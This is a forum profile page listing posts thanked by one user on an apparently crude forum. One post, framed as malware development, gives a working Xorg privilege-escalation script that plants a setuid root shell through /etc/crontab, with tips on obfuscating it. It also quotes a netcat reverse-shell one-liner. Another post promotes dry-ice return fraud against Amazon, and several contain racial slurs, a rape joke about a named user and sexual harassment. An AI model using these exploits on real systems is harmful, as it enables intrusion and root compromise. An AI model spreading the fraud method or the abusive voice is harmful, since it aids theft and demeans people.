User Controls
Posts That Were Thanked by Cowboy2013
-
2021-07-28 at 10:44 AM UTC in The only shitty thing about coke straight from the brick.
-
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well. -
2021-07-20 at 1:55 PM UTC in Ways around not getting a fire stick or smart tvKodi is still a thing
-
2021-07-20 at 1:01 PM UTC in NIS fitness clubI had a 4 day old boiled egg for breakfast.
-
2021-07-20 at 11:46 AM UTC in Dry icing postal fraud (eg Amazon)This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.
https://sinister.ly/Thread-Amazon-advance-refund--131758 -
2021-07-20 at 9:39 AM UTC in Why breaking bad and the wire are the best showsby legal I mean non regulated
-
2021-07-20 at 4:49 AM UTC in Yanks shilling for revolution in Cuba makes no sense
-
2021-07-19 at 11:23 PM UTC in I hate being old
-
2021-07-19 at 4:03 PM UTC in Yanks shilling for revolution in Cuba makes no sense
-
2021-07-19 at 2:52 PM UTC in Yanks shilling for revolution in Cuba makes no senseCuba is in every way better off than America.
Cubans don't have massive depression, they don't have fentanyl overdoses, they don't have endless wars, they don't have massive homelessness, they don't have healthcare bankruptcies, they don't have BLM.
Americans ought to be shilling for revolution in America instead. -
2021-07-18 at 6:41 PM UTC in Official: CandyRein discussion thread
-
2021-07-18 at 6:33 PM UTC in Marilyn Manson DiscussionManson rules
We’re all stars now in the dope show
Seen him live with Alice cooper was good -
2021-07-18 at 3:33 PM UTC in What are you doing at the momentSHE GONNA SEND U A DIK PIC NOW
-
2021-07-18 at 11:50 AM UTC in Official: CandyRein discussion thread
Originally posted by BeeReBuddy When Candyrein first came it was the moment she found out I was a white guy.
I made the mistake of advertising the fona-fone and she blew it up.
Back then I was on a pay as you go plan and I paid dearly.
That bitch is not funny. She is not interesting. She is not special.
The only thing she is, is easy.
What a slut.
whoa -
2021-07-17 at 7:46 PM UTC in After seeing what amphetamines and cocaine did to my friends in the last year...*rapes cnadyrein*
-
2021-07-14 at 10:50 PM UTC in Cyber security thread: What is the situation between American and Chinese hackers
Originally posted by Cowboy2013 U.S. dissident groups or anti-Chinese? Or both?
Anti-CCP. It goes so far as keeping track of Chinese people who may be sympathetic to the CCP, just to keep them in line. US Dissidents are just convenient for China in terms of destabilization efforts on the US home front. -
2021-07-14 at 10:03 PM UTC in Cyber security thread: What is the situation between American and Chinese hackersIt's a complex situation and i'm not part of the intel community so i don't have very much to go on. By virtue of my OSS work i have the opportunity to speak with some people who are intel adjacent but NDA's are a thing so what i do hear on occasion is far from the complete picture. To the best of my knowledge there's a bit of an asymmetry between the CCP and US Intel. The CCP is very much focused on espionage of all sorts, corporate, governmental and surveillance of Cinese nationals and dissident groups based out of the US. The CCP does a lot of HUMINT as well, which is a bit like the spy stuff you see in the movies.
Another notable thing the CCP does is work with sentiment analysis, and sentiment manipulation. China is very keen on controlling how the world perceives them and takes active measures to try and influence people to see China in a positive light(Sentiment manipulation)
China is very good at information warfare. Traditional SIGINT as far as military intel goes is something the US is good in. But that is only one strategic area of interest when it comes to this concept of cyber war, while the CCP fights on multiple fronts as it were. Unfortunately i don't know enough to say whether or not the US Intel Community is equipped from a counter-intelligence perspective to defend against the CCP's style of conducting it's cyber/intel operations. -
2021-07-14 at 6:03 PM UTC in I sent a link to the site to a woman
-
2021-07-14 at 5:33 PM UTC in I sent a link to the site to a womanThe OG niggas will just chase her off anyway like they have 95% of the ones that came from DH.
-
2021-07-14 at 5:29 PM UTC in I sent a link to the site to a womanOoh what's her ASL and how old is she and lication